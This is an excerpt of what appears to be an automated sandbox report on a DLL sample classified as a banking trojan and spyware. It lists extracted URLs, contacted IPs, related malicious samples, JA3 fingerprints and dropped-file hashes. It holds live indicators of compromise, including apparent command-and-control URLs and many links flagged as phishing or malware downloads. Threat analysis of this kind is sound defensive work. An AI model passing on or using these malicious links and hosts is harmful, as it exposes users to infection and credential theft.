http://rosadalking.xyz/images/3U_2B2PC7eNms4Rfw/m2bayU1bYGRN/mfyZR8juil8/5WDNQcansH_2FP/bNCVxlxtGYDs	{F0C73B59-3FD1-11EB-90E5-ECF4BB570DC9}.dat.21.dr	true	Avira URL Cloud: safe	unknown
http://www.abril.com.br/favicon.ico	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.daum.net/	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 0000001C.00000002.495468052.00000224A0A41000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.naver.com/favicon.ico	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false		high
http://search.msn.co.jp/results.aspx?q=	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.clarin.com/favicon.ico	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false		high
http://buscar.ozu.es/	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://kr.search.yahoo.com/	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false		high
http://search.about.com/	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false		high
http://busca.igbusca.com.br/	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false		high
http://www.ask.com/	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false		high
http://www.priceminister.com/favicon.ico	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 0000001C.00000002.477701499.0000022490BF0000.00000004.00000001.sdmp	false		high
http://www.cjmall.com/	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false		high
http://search.centrum.cz/	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false		high
http://www.carterandcone.coml	explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://185.156.172.54/images/TMwZ54mn/_2B0YUdRavAKwwypVOfrYnt/6W6xbFFdug/RuY3cr5ZWBeuRUS61/qsMNDxm8	explorer.exe, 00000025.00000002.647622896.00000000053C4000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://suche.t-online.de/	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false		high
http://www.google.it/	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false		high
http://search.auction.co.kr/	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.ceneo.pl/	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false		high
http://www.amazon.de/	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false		high
http://sads.myspace.com/	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false		high
http://busca.buscape.com.br/favicon.ico	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.pchome.com.tw/favicon.ico	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://browse.guardian.co.uk/favicon.ico	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://google.pchome.com.tw/	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://list.taobao.com/browse/search_visual.htm?n=15&q=	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false		high
http://www.rambler.ru/favicon.ico	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false		high
http://uk.search.yahoo.com/	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false		high
http://espanol.search.yahoo.com/	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false		high
http://www.ozu.es/favicon.ico	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://search.sify.com/	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false		high
http://openimage.interpark.com/interpark.ico	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false		high
http://search.yahoo.co.jp/favicon.ico	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.ebay.com/	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false		high
http://www.gmarket.co.kr/	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn/bThe	explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://ocsp.sectigo.com0	5fd9d7ec9e7aetar.dll	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.nifty.com/	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false		high
http://searchresults.news.com.au/	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.google.si/	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false		high
http://www.google.cz/	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false		high
http://www.soso.com/	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false		high
http://www.univision.com/	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false		high
http://search.ebay.it/	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false		high
http://www.amazon.com/	msapplication.xml.4.dr	false		high
http://images.joins.com/ui_c/fvc_joins.ico	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false		high
http://www.asharqalawsat.com/	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://busca.orange.es/	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false		high
http://cnweb.search.live.com/results.aspx?q=	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false		high
http://www.twitter.com/	msapplication.xml5.4.dr	false		high
http://auto.search.msn.com/response.asp?MT=	explorer.exe, 00000025.00000000.450828486.00000000066A0000.00000002.00000001.sdmp	false		high
http://search.yahoo.co.jp	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.target.com/	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false		high
http://buscador.terra.es/	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.typography.netD	explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
193.56.255.167	unknown	Romania	213137	INFOCLOUD-SRLMD	true
89.44.9.160	unknown	Romania	9009	M247GB	false
216.58.210.2	unknown	United States	15169	GOOGLEUS	false
185.156.172.54	unknown	Romania	9009	M247GB	false

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	331120
Start date:	16.12.2020
Start time:	11:05:33
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 13s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	5fd9d7ec9e7aetar.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	39
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.bank.troj.spyw.evad.winDLL@43/54@6/4
EGA Information:	Failed
HDC Information:	Successful, ratio: 24.7% (good quality ratio 22.5%) Quality average: 74.6% Quality standard deviation: 32.3%
HCA Information:	Successful, ratio: 98% Number of executed functions: 171 Number of non-executed functions: 36
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .dll
Warnings:	Show All Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information. Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, ielowutil.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe Excluded IPs from analysis (whitelisted): 104.42.151.234, 40.88.32.150, 88.221.62.148, 216.58.207.74, 172.217.23.100, 92.122.144.200, 51.11.168.160, 152.199.19.161, 20.54.26.129, 51.103.5.186, 92.122.213.194, 92.122.213.247, 51.104.139.180, 52.155.217.156, 84.53.167.113, 8.248.147.254, 8.253.207.120, 8.248.113.254, 8.248.125.254, 8.248.121.254 Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wns.notify.windows.com.akadns.net, a1449.dscg2.akamai.net, e15275.g.akamaiedge.net, arc.msn.com, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, firestore.googleapis.com, par02p.wns.notify.windows.com.akadns.net, go.microsoft.com, emea1.notify.windows.com.akadns.net, wildcard.weather.microsoft.com.edgekey.net, audownload.windowsupdate.nsatc.net, www.google.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, auto.au.download.windowsupdate.com.c.footprint.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, ie9comview.vo.msecnd.net, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, tile-service.weather.microsoft.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, pagead2.googlesyndication.com, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, skypedataprdcolwus16.cloudapp.net, cs9.wpc.v0cdn.net Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
11:07:47	API Interceptor	42x Sleep call for process: powershell.exe modified
11:08:09	API Interceptor	1x Sleep call for process: loaddll32.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
89.44.9.160	5fd885c499439tar.dll	Get hash	malicious	Browse
	5fc612703f844.dll	Get hash	malicious	Browse
	5fbce6bbc8cc4png.dll	Get hash	malicious	Browse
	960.dll	Get hash	malicious	Browse
216.58.210.2	EasyAdBlocker.exe	Get hash	malicious	Browse
	https://www.fosshub.com/Calibre.html/calibre-5.6.0.msi	Get hash	malicious	Browse
	https://nursing-theory.org/nursing-theorists/Isabel-Hampton-Robb.php	Get hash	malicious	Browse
	https://www.canva.com/design/DAEOcBy2dTg/1IjeQ8nYTzcxbMsaULT2SQ/view?utm_content=DAEOcBy2dTg&utm_campaign=designshare&utm_medium=link&utm_source=publishsharelink	Get hash	malicious	Browse
	https://dex.us2.list-manage.com/track/click?u=0e84d7930d0fcc3be767077df&id=1748a0d5ec&e=a00a87a2a5	Get hash	malicious	Browse
	http://23.129.64.206	Get hash	malicious	Browse
	http://savivo.s3.us-east-2.amazonaws.com/Download.html	Get hash	malicious	Browse
	UltraVNC_1_2_40_X64_Setup.exe	Get hash	malicious	Browse
	https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fwww.yumpu.com%2fxx%2fdocument%2fread%2f64931164%2f&c=E,1,-sgzpg1AZpPpbFR1RjTeq0oEJHXEAOT2hADFEAiebAiO1Uf3DcE85yhh9Qa1L0tSRsuedcssyUhITdc9KJcmwrmi8vEBUlN1c1mjijmvlVgg&typo=1	Get hash	malicious	Browse
	https://app.box.com/s/8mkzhwsgsowgkcy046cu3h48c41n72ad	Get hash	malicious	Browse
	https://forums.iboats.com/forum/general-boating-outdoors-activities/boat-topics-and-questions-not-engine-topics/558373-need-help-from-all-my-tahoe-q4-guys-regaring-smart-tabs-sx	Get hash	malicious	Browse
	http://free.internetspeedutility.net	Get hash	malicious	Browse
	https://www.dropbox.com/l/AAA2DoX5sySpyQYCDpt4a1SpAYvXnQVIg2Q	Get hash	malicious	Browse
	http://mediaonetv.in	Get hash	malicious	Browse
	https://you6775.wixsite.com/mysite	Get hash	malicious	Browse
	https://mandrillapp.com/track/click/31051831/www.windstreamenterprise.com?p=eyJzIjoibkZVWFZGMEN0V2tTOGRnWTRlUDFFQl90Z1VrIiwidiI6MSwicCI6IntcInVcIjozMTA1MTgzMSxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL3d3dy53aW5kc3RyZWFtZW50ZXJwcmlzZS5jb21cXFwvc3VwcG9ydFxcXC9cIixcImlkXCI6XCJjMGQxZTQ1ODEwN2M0YjI1YmFiNTVhZTNhYzFmOTY4Y1wiLFwidXJsX2lkc1wiOltcIjFjNWUyNDQ2NDZhNTgxZDQ5YTNmZGY1MzNmMGE2ZWUyMjkyODE3NGNcIl19In0	Get hash	malicious	Browse
	com.virus.hunter_5_apps.evozi.com.apk	Get hash	malicious	Browse
	wercplsupporte.dll	Get hash	malicious	Browse
	coffee.apk	Get hash	malicious	Browse
185.156.172.54	5fd885c499439tar.dll	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
pagead46.l.doubleclick.net	Standardequips_Quote.ppt	Get hash	malicious	Browse	172.217.23.98
	Purchase list.ppt	Get hash	malicious	Browse	172.217.23.98
	http://catalog.amsz.ua/1.php	Get hash	malicious	Browse	172.217.16.130
	http://perpetual.veteran.az/673616c6c792e64756e6e654070657270657475616c2e636f6d2e6175	Get hash	malicious	Browse	172.217.16.194
	https://www.canva.com/design/DAEQaeaaGJc/AmdtXu5OSC0eLH8bw2s2PQ/view?utm_content=DAEQaeaaGJc&utm_campaign=designshare&utm_medium=link&utm_source=publishsharelink	Get hash	malicious	Browse	216.58.207.34
	https://www.canva.com/design/DAEQTBaGocw/52ZBagxCMqfK9OyKkSMYDw/view?utm_content=DAEQTBaGocw&utm_campaign=designshare&utm_medium=link&utm_source=publishsharelink	Get hash	malicious	Browse	172.217.18.98
	https://omsd-org.gq/?login=do&c=E,1,MTY2COfqGo5C-H4KALYqrUyXXPpd2evSCW3stb24PsdKe8xYdoYVhcjchdnzpUCr95AnX7X4QDVSQFpJtN_EpMZ8u2smwVQNUpYGz7Etn-l-NVb_st2_649iVg,,&typo=1	Get hash	malicious	Browse	172.217.18.98
	https://www.canva.com/design/DAEQZJ2RxL4/pSFyhiLxB4Tyh_9wmjeJdw/view?utm_content=DAEQZJ2RxL4&utm_campaign=designshare&utm_medium=link&utm_source=sharebutton	Get hash	malicious	Browse	172.217.21.226
	https://townemortgage-my.sharepoint.com/:b:/p/cislami/ETa8xXdrX-FKtlaSfOphTioBLICbx4muhejuoDN0jK0wqw?e=4%3aBnR24e&at=9	Get hash	malicious	Browse	172.217.21.226
	5fd885c499439tar.dll	Get hash	malicious	Browse	172.217.22.66
	2020141248757837844.ppt	Get hash	malicious	Browse	172.217.18.98
	https://iofs.typeform.com/to/vj4hQ0pX	Get hash	malicious	Browse	172.217.16.162
	http://www.nativlang.com	Get hash	malicious	Browse	216.58.205.226
	https://secureddoc.unicornplatform.com/	Get hash	malicious	Browse	172.217.168.66
	https://bit.ly/3nUsOZY	Get hash	malicious	Browse	172.217.168.2
	https://bitly.com/3ndw7LZ	Get hash	malicious	Browse	216.58.215.226
	http://gmai.com	Get hash	malicious	Browse	172.217.168.2
	http://catalog.amsz.ua/1.php	Get hash	malicious	Browse	172.217.21.226
	http://www.cqdx.ru	Get hash	malicious	Browse	216.58.215.226
	http://kikicustomwigs.com/inefficient.php	Get hash	malicious	Browse	172.217.168.34
resolver1.opendns.com	5fd885c499439tar.dll	Get hash	malicious	Browse	208.67.222.222
	5fc612703f844.dll	Get hash	malicious	Browse	208.67.222.222
	https___purefile24.top_4352wedfoifom.dll	Get hash	malicious	Browse	208.67.222.222
	vnaSKDMnLG.dll	Get hash	malicious	Browse	208.67.222.222
	0xyZ4rY0opA2.vbs	Get hash	malicious	Browse	208.67.222.222
	6Xt3u55v5dAj.vbs	Get hash	malicious	Browse	208.67.222.222
	5fbce6bbc8cc4png.dll	Get hash	malicious	Browse	208.67.222.222
	JeSoTz0An7tn.vbs	Get hash	malicious	Browse	208.67.222.222
	1qdMIsgkbwxA.vbs	Get hash	malicious	Browse	208.67.222.222
	2Q4tLHa5wbO1.vbs	Get hash	malicious	Browse	208.67.222.222
	0wDeH3QW0mRu.vbs	Get hash	malicious	Browse	208.67.222.222
	0k4Vu1eOEIhU.vbs	Get hash	malicious	Browse	208.67.222.222
	earmarkavchd.dll	Get hash	malicious	Browse	208.67.222.222
	6znkPyTAVN7V.vbs	Get hash	malicious	Browse	208.67.222.222
	a7APrVP2o2vA.vbs	Get hash	malicious	Browse	208.67.222.222
	03QKtPTOQpA1.vbs	Get hash	malicious	Browse	208.67.222.222
	fY9ZC2mGfd.exe	Get hash	malicious	Browse	208.67.222.222
	H58f3VmSsk.exe	Get hash	malicious	Browse	208.67.222.222
	2200.dll	Get hash	malicious	Browse	208.67.222.222
	5faabcaa2fca6rar.dll	Get hash	malicious	Browse	208.67.222.222

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
M247GB	wZ9i5Wbx95.exe	Get hash	malicious	Browse	172.94.120.37
	Ctr-066970-xlsx.HtmL	Get hash	malicious	Browse	91.207.103.145
	6LrVLjE7hL.exe	Get hash	malicious	Browse	172.94.120.36
	5fd885c499439tar.dll	Get hash	malicious	Browse	89.44.9.160
	Bl_InvDraft1652.doc	Get hash	malicious	Browse	172.94.120.17
	GPpzgvxnR7.exe	Get hash	malicious	Browse	194.187.251.163
	ruY81qdh8o.exe	Get hash	malicious	Browse	37.120.222.241
	SecuriteInfo.com.Trojan.InjectNET.14.41.exe	Get hash	malicious	Browse	37.120.222.241
	ORDER #0622.exe	Get hash	malicious	Browse	37.120.208.36
	olVrlak5Hb.exe	Get hash	malicious	Browse	37.120.156.163
	ORDER # 00246XF.exe	Get hash	malicious	Browse	37.120.208.40
	Payment Advice Note from 12_07_2020.exe	Get hash	malicious	Browse	89.249.74.213
	Consignment Document PL&BL Draft.exe	Get hash	malicious	Browse	172.94.25.202
	5fc612703f844.dll	Get hash	malicious	Browse	89.44.9.160
	QUOTATION MD20-2097.exe	Get hash	malicious	Browse	89.249.74.213
	Shipping Document PLBL Draft.exe	Get hash	malicious	Browse	172.94.25.202
	Inquiry-20201130095115.exe	Get hash	malicious	Browse	172.94.25.202
	payment_APEK201128.exe	Get hash	malicious	Browse	89.249.74.213
	QUOTE#450009123.exe	Get hash	malicious	Browse	89.249.74.213
	Paymentreportadvice.exe	Get hash	malicious	Browse	89.249.74.213
GOOGLEUS	Standardequips_Quote.ppt	Get hash	malicious	Browse	172.217.22.33
	Purchase list.ppt	Get hash	malicious	Browse	172.217.22.33
	Ctr-385096-xlsx.HtmL	Get hash	malicious	Browse	216.239.34.21
	GiBkCmvHdG.exe	Get hash	malicious	Browse	216.58.200.132
	gunzipped.exe	Get hash	malicious	Browse	34.102.136.180
	https://f000.backblazeb2.com/file/amalgamization1053/index.html	Get hash	malicious	Browse	172.217.16.129
	sample.exe	Get hash	malicious	Browse	34.77.225.87
	http://catalog.amsz.ua/1.php	Get hash	malicious	Browse	172.217.16.130
	http://perpetual.veteran.az/673616c6c792e64756e6e654070657270657475616c2e636f6d2e6175	Get hash	malicious	Browse	172.217.22.34
	Ctr-066970-xlsx.HtmL	Get hash	malicious	Browse	172.217.16.129
	https://www.canva.com/design/DAEQaeaaGJc/AmdtXu5OSC0eLH8bw2s2PQ/view?utm_content=DAEQaeaaGJc&utm_campaign=designshare&utm_medium=link&utm_source=publishsharelink	Get hash	malicious	Browse	216.58.207.34
	manager.apk	Get hash	malicious	Browse	216.58.212.170
	https://email.tungsten-network.com/K00kzKB00nv60AOP31Bq0G0	Get hash	malicious	Browse	172.217.18.99
	https://docs.google.com/document/d/e/2PACX-1vSbRneZ10Uy_W4WHBEuQJFXWvuKNc-TuxXXxEsz5UoXFKIMq_wifDJA6zGHuyiVmPrMQOoawq9xKLHI/pub	Get hash	malicious	Browse	172.217.16.129
	PURCHASE_ORDER.xlsx	Get hash	malicious	Browse	34.102.136.180
	athwIp3L1t.exe	Get hash	malicious	Browse	34.102.136.180
	3Y690n1UsS.exe	Get hash	malicious	Browse	34.102.136.180
	http://theupsstoree.com	Get hash	malicious	Browse	172.217.22.33
	G18O5K36bR.exe	Get hash	malicious	Browse	34.102.136.180
	https://www.canva.com/design/DAEQTBaGocw/52ZBagxCMqfK9OyKkSMYDw/view?utm_content=DAEQTBaGocw&utm_campaign=designshare&utm_medium=link&utm_source=publishsharelink	Get hash	malicious	Browse	172.217.16.130
M247GB	wZ9i5Wbx95.exe	Get hash	malicious	Browse	172.94.120.37
	Ctr-066970-xlsx.HtmL	Get hash	malicious	Browse	91.207.103.145
	6LrVLjE7hL.exe	Get hash	malicious	Browse	172.94.120.36
	5fd885c499439tar.dll	Get hash	malicious	Browse	89.44.9.160
	Bl_InvDraft1652.doc	Get hash	malicious	Browse	172.94.120.17
	GPpzgvxnR7.exe	Get hash	malicious	Browse	194.187.251.163
	ruY81qdh8o.exe	Get hash	malicious	Browse	37.120.222.241
	SecuriteInfo.com.Trojan.InjectNET.14.41.exe	Get hash	malicious	Browse	37.120.222.241
	ORDER #0622.exe	Get hash	malicious	Browse	37.120.208.36
	olVrlak5Hb.exe	Get hash	malicious	Browse	37.120.156.163
	ORDER # 00246XF.exe	Get hash	malicious	Browse	37.120.208.40
	Payment Advice Note from 12_07_2020.exe	Get hash	malicious	Browse	89.249.74.213
	Consignment Document PL&BL Draft.exe	Get hash	malicious	Browse	172.94.25.202
	5fc612703f844.dll	Get hash	malicious	Browse	89.44.9.160
	QUOTATION MD20-2097.exe	Get hash	malicious	Browse	89.249.74.213
	Shipping Document PLBL Draft.exe	Get hash	malicious	Browse	172.94.25.202
	Inquiry-20201130095115.exe	Get hash	malicious	Browse	172.94.25.202
	payment_APEK201128.exe	Get hash	malicious	Browse	89.249.74.213
	QUOTE#450009123.exe	Get hash	malicious	Browse	89.249.74.213
	Paymentreportadvice.exe	Get hash	malicious	Browse	89.249.74.213

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
57f3642b4e37e28f5cbe3020c9331b4c	5fd885c499439tar.dll	Get hash	malicious	Browse	216.58.210.2
	https://secureddoc.unicornplatform.com/	Get hash	malicious	Browse	216.58.210.2
	http://contoubi00.epizy.com/ubi/	Get hash	malicious	Browse	216.58.210.2
	https://secureddoc.unicornplatform.com	Get hash	malicious	Browse	216.58.210.2
	http://vcomdesign.com	Get hash	malicious	Browse	216.58.210.2
	https://aud-amplified.unicornplatform.com/	Get hash	malicious	Browse	216.58.210.2
	https://cloud.vectorworks.net/links/11eb34bf3e0b15d489a10aa721e465bf	Get hash	malicious	Browse	216.58.210.2
	https://dynalist.io/d/TcKkPvWijzGN4uv-0OCmM26A	Get hash	malicious	Browse	216.58.210.2
	https://app.nihaocloud.com/f/06096e5837654796a4d4/	Get hash	malicious	Browse	216.58.210.2
	https://ngor.zlen.com.ua/Restore/Click here to restore message automatically.html	Get hash	malicious	Browse	216.58.210.2
	https://rebrand.ly/we9zn	Get hash	malicious	Browse	216.58.210.2
	https://rebrand.ly/we9zn	Get hash	malicious	Browse	216.58.210.2
	MOI Support ship V2.docx	Get hash	malicious	Browse	216.58.210.2
	MOI Support ship V2.docx	Get hash	malicious	Browse	216.58.210.2
	MOI Support ship V2.docx	Get hash	malicious	Browse	216.58.210.2
	https://peraichi.com/landing_pages/expergy1	Get hash	malicious	Browse	216.58.210.2
	http://slimware.com	Get hash	malicious	Browse	216.58.210.2
	http://mase.bubbleapps.io	Get hash	malicious	Browse	216.58.210.2
	http://krypton.rackage.co.uk	Get hash	malicious	Browse	216.58.210.2
	https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fleaveittobarcelona.com%2fDraftCD%2fNew%2fDocSigning.htm&c=E,1,PQ9aQZEFvDJC_gmInjKl0nyrLKMOCaMfjs7T_XydxoTvKHjPaQkphW8yDUB0petSI4yBSLeZsKlg4GHghMUTGGUHuXyZ3KFkrQu9-dk7gQ,,&typo=1	Get hash	malicious	Browse	216.58.210.2
7dd50e112cd23734a310b90f6f44a7cd	5fd885c499439tar.dll	Get hash	malicious	Browse	185.156.172.54
	lnzn.dll	Get hash	malicious	Browse	185.156.172.54
	vnaSKDMnLG.dll	Get hash	malicious	Browse	185.156.172.54
	fiksat.exe	Get hash	malicious	Browse	185.156.172.54
	710162.exe	Get hash	malicious	Browse	185.156.172.54
	document-359248421.xlsb	Get hash	malicious	Browse	185.156.172.54
	md.exe	Get hash	malicious	Browse	185.156.172.54
	hiizymk.exe	Get hash	malicious	Browse	185.156.172.54
	AhiBP9tTQa.exe	Get hash	malicious	Browse	185.156.172.54
	a1a1.exe	Get hash	malicious	Browse	185.156.172.54
	mdo.exe	Get hash	malicious	Browse	185.156.172.54
	https://support.zuriwebs.com/extend/249719113/249719113.zip	Get hash	malicious	Browse	185.156.172.54
	https://1drv.ms/u/s!An0EeTXBN8JIlzfbroJgDUomzO45?e=6URjKX	Get hash	malicious	Browse	185.156.172.54
	http://thammyroyal.com/wp-content/uploads/2020/04/slider/0573/0573.zip	Get hash	malicious	Browse	185.156.172.54
	44.exe	Get hash	malicious	Browse	185.156.172.54
	https://abccerti.com/staple/62766862.zip	Get hash	malicious	Browse	185.156.172.54
	https://centrosoluzioni.com/wp-content/uploads/2020/02/safety/67817.zip	Get hash	malicious	Browse	185.156.172.54
	aaaa.png.exe	Get hash	malicious	Browse	185.156.172.54
	ZCUBQSIG.EXE	Get hash	malicious	Browse	185.156.172.54
	http://adrianfowle.co.uk/CCN3387131189795E_186606.zip	Get hash	malicious	Browse	185.156.172.54

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{CB1D97F9-3FD1-11EB-90E5-ECF4BB570DC9}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	29272
Entropy (8bit):	1.7742246322797681
Encrypted:	false
SSDEEP:	96:rzZAZw2v9W/tSvbfSY8gnKMlYbv5zZjq9cY6gMB:rzZAZw2v9W/tSzfSY8BMlYxc9cYiB
MD5:	DFA95E759592E6E2DC1DE37811CD8D1F
SHA1:	DEFE79DBB8797143A99A5146C6FA1CC4E33AE6EF
SHA-256:	703A042BD771BC2F5CEA13426286574D32991C4203C4656E731504A232DFE186
SHA-512:	2F468511DF7DB0286EC3D1C604615E07C1E03E951C77B8B310F7AF029454748EC12E26DE17A7D8EA3F90F895194584A8B24237451F5633EC590B971248668ACF
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{F0C73B55-3FD1-11EB-90E5-ECF4BB570DC9}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	71272
Entropy (8bit):	2.04581375764452
Encrypted:	false
SSDEEP:	192:rmZNZo2g9WcVtcUfc3xMyxVt0tt1stDtty6stLfyS6syGtyWQryRBfX:rij/gUufzUaALAVthCiZ
MD5:	3786E542BCCB59557B2C60DF88A2BEA3
